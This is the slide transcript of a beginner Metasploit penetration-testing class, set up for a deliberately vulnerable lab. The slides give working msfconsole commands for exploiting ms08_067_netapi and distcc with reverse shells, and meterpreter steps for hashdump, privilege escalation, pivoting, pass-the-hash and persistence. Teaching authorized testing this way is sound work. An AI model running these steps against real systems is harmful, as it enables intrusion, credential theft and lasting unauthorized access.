Metasploit for Penetration Testing: Beginner Class
Upcoming SlideShare
Loading in...5

Like this? Share it with your network


Metasploit for Penetration Testing: Beginner Class



Slides for the beginning Metasploit class.

Slides for the beginning Metasploit class.



Total Views
Views on SlideShare
Embed Views



5 Embeds 203 126 69 3 3 2



Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
Post Comment
Edit your comment

Metasploit for Penetration Testing: Beginner Class Presentation Transcript

  • 1. Penetration Testing with Metasploit Georgia Weidman
  • 2. Acknowledgements• Metasploit Team• Offensive Security/Metasploit Unleashed• Hackers for Charity• David Kennedy• BSides Delaware Crew• Darren
  • 3. Agenda• Metasploit Basics – Some terminology/brief intro to pentesting – How Metasploit works – Interacting with Metasploit• Basic Exploitation – Exploiting a vulnerability using Metasploit console• Using Meterpreter – Using the Meterpreter shell for post exploitation
  • 4. Agenda• Metasploit in a penetration test – Information Gathering – Vulnerability Scanning – Exploitation in depth – Post exploitation – Reporting• Hack some stuff – Pop my boxes
  • 5. ConnectingWireless access point SSID IgnatiusRileyPassword: metasploit
  • 6. What’s in the lab?• Windows XP SP2 – IP address:• Ubuntu Linux 8.04 (Metasploitable) – IP address: Others below .100 (.100 and above are you guys)
  • 7. What is Penetration Testing?Simulation of a real attackGet out of jail free card for exploiting systemsReport to customers with findings and recommendationsFind and remediate vulnerabilities before attackers exploit them
  • 8. What is Metasploit?Exploitation frameworkRuby basedModularExploits, payloads, auxiliaries, and more
  • 9. Metasploit TerminologyExploit: vector for penetrating the systemPayload: shellcode, what you want the exploit to doEncoders: encode or mangle payloadAuxiliary: other modules besides exploitationSession: connection from a successful exploit
  • 10. Metasploit InterfacesMsfconsoleMsfcliMsfweb, Msfgui (discontinued)Metasploit Pro, Metasploit ExpressArmitage
  • 11. Exploitation Streamlining• Traditional Pentest: – Find public exploit – Change offsets and return address for your target – Replace shellcode• Metasploit: – Load Metasploit module – Select target OS – Set IP addresses – Select payload
  • 12. Using Msfconsole: Exploitationuse <module> - sets exploit/auxillary/etc. to useset <x X> - set a parametersetg <x X> - set a parameter globallyshow <x> - lists all available xexploit – runs the selected module
  • 13. Windows Exploitation Examplesearch windows/smbinfo windows/smb/ms08_067_netapiuse windows/smb/ms08_067_netapishow payloadsset payload windows/meterpreter/reverse_tcpshow optionsset lhost (set other options as well)exploit
  • 14. MSFcli Exploitation Example./msfcli <exploit> <option=x> EExample: msfcli windows/smb/ms08_067_netapiRHOST= LHOST= EE = exploitO = show optionsP = show payloads
  • 15. Linux Exploitation Examplesearch distccuse unix/misc/distcc_execshow payloadsset payload cmd/unix/reverseshow optionsset rhost lhost (your ip)exploit
  • 16. Sessionssessions -l lists all active sessionsSessions –i <id> interact with a given session
  • 17. MeterpreterGain a session using a meterpreter payloadMemory based/never hits the diskEverything a shell can do plus extra
  • 18. Meterpreter Commandshelp – shows all available commandsbackground – backgrounds the sessionps – shows all processesmigrate <process id>– moves meterpreter toanother processgetuid – shows the user
  • 19. Meterpreter Commandsdownload <file> - pulls a file from the victimupload <file on attacker> <file on victim> - pushes a file to the victimhashdump – dumps the hashes from the samshell – drops you in a shell
  • 20. ExerciseIn Msfconsole use ms08_067_netapi to get a reverse meterpreter shell on the Windows XP machine.Experiment with different payloads and meterpreter commands.
  • 21. Information GatheringLearning as much about a target as possibleExamples: open ports, running services, installed softwareIdentify points for further exploration
  • 22. Metasploit and DatabasesMetasploit supports MySQL and PostgreSQL/etc/init.d/postgresql-8.4 start (starts PostgeSQL)msf > db_connectpostgres:password@ (connects to database server and creates database metasploit)
  • 23. PortscanningQueries a host to see if a program is listeningEx: Browsing to a website – webserver listens on port 80Listening ports are accessible by an attacker and if vulnerable may be used for exploitationEx: ms08_067_netapi exploits smb on port 445
  • 24. Metasploit and nmapPort scanning and just about everything else man nmapEx: nmap -sV -oA subnet1 (TCP version scan, all hosts 192.168.20.X, outputs multiple formats beginning with subnet1)msf > db_import subnet1.xml
  • 25. MSF Axillary Portscannersmsf > search portscan (shows portscan modules)scanner/portscan/tcp (runs a TCP syn scan)Use auxiliary modules like exploits (use, set, exploit, etc.)
  • 26. Some Other MSF Scannersscanner/smb/smb_version (scans port 445 for the smb version, good way to get OS version)scanner/ssh/ssh_version (queries the ssh version)scanner/ftp/anonymous (anonymous ftp login)
  • 27. Vulnerability ScanningQuery systems for potential vulnerabilitiesIdentify potential methods of penetrationEx: SMB version scan in information gathering returned port 445 open and target Windows XP SP2, scan for ms08_067_netapi vulnerability
  • 28. Metasploit and NessusTenables Vulnerability Scanner (>load nessusmsf > nessus_connect student1:password@ ok (ok says no ssl is ok)msf > nessus_policy_listmsf > nessus_scan_new -4 pwnage <ip range> (scan using policy one, name it pwnage)msf> nessus_report_listmsf> nessus_report_get <report id>
  • 29. Metasploit Vulnerability ScannersSMB Login Given a set of credentials what systems can they access? scanner/smb/smb_loginOpen VNC and X11 If misconfigured may be accessible without credentials scanner/vnc/vnc_none_auth scanner/x11/open_x11
  • 30. Using Msfconsole: Exploitationuse <module> - sets exploit/auxillary/etc. to useset <x X> - set a parametersetg <x X> - set a parameter globallyshow <x> - lists all available xexploit – runs the selected module
  • 31. Our Databasehostsservicesvulns-c select columns-s search for specific string
  • 32. db_autopwnBy default just runs all the exploits that match a given open portNot stealthyUsing vulnerability data can be made smarter, matches vulnerabilities instead of portsdb_autopwn -x -e
  • 33. Attacking MSSQLMSSQL TCP port can change, UDP port is 1434msf> search mssql (shows all mssql modules)msf> use scanner/mssql/mssql_ping (queries UDP 1434 for information including TCP port)msf> use scanner/mssql/mssql_login (tries passwords to log into mssql)msf> use windows/mssql/mssql_payload (logs into mssql and gets a shell
  • 34. We have a shell, now what?Privilege escalationLocal information gatheringExploiting additional hostsMaintaining accessForensic avoidance
  • 35. Meterpreter: Privilege EscalationA session has the privileges of the exploited processgetuid (tells you what user your session is running as)getsystem (tries various techniques to escalate privileges)
  • 36. Meterpreter: Enabling Remote DesktopTurn on remote desktop, get it through the firewall, put a user in the remote desktop users grouprun getgui –e
  • 37. Meterpreter: MigratingIf the process that hosts meterpreter closes meterpreter dies tooExample: client side exploit residing in the browsermeterpreter> ps (shows all processes)meterpreter> migrate <process id> (moves to a new process)
  • 38. Meterpreter: Searching for ContentLook for specific interesting files on the exploited systemsearch -hExample: search -f *.jpg (finds all the porn)
  • 39. PivotingScenario: Exploit a dual networked host, with a routeable interface and non routable one. Can we attack other hosts on the non routeable interface without SSH tunneling?Route add 1 (routes traffic to the subnet through session 1)Now you can portscan, exploit, etc. the non routable subnet
  • 40. PSExechashdump (dumps the hashes, not always easy to crack)Why not just pass the hash to other systems?use windows/smb/psexecset SMBPass to the hash
  • 41. Meterpreter: PersistencePersistence script installs a meterpreter serviceMeterpreter comes back when the box restarts Ex: run persistence -U -i 5 -p 443 –r (respawns on login, at a 5 second interval on port 443 to ip
  • 42. ExercisesPerform a penetration test on the Windows and Linux systems we used in classPerform a penetration test on the lab network
  • 43. Contact Georgia WeidmanWebsite: Email: Twitter: @vincentkadmon